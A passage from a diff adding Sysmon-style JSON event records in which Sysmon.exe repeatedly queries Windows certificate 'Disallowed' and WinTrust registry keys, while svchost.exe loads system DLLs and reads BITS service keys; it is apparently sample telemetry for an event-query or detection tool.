"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "bitsperf.dll", + "image_path": "C:\\Windows\\System32\\bitsperf.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877140000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "wintrust.dll", + "image_path": "C:\\Windows\\System32\\wintrust.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "xmllite.dll", + "image_path": "C:\\Windows\\System32\\xmllite.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877140000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS\\PerfMMFileName", + "registry_value": "PerfMMFileName", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": 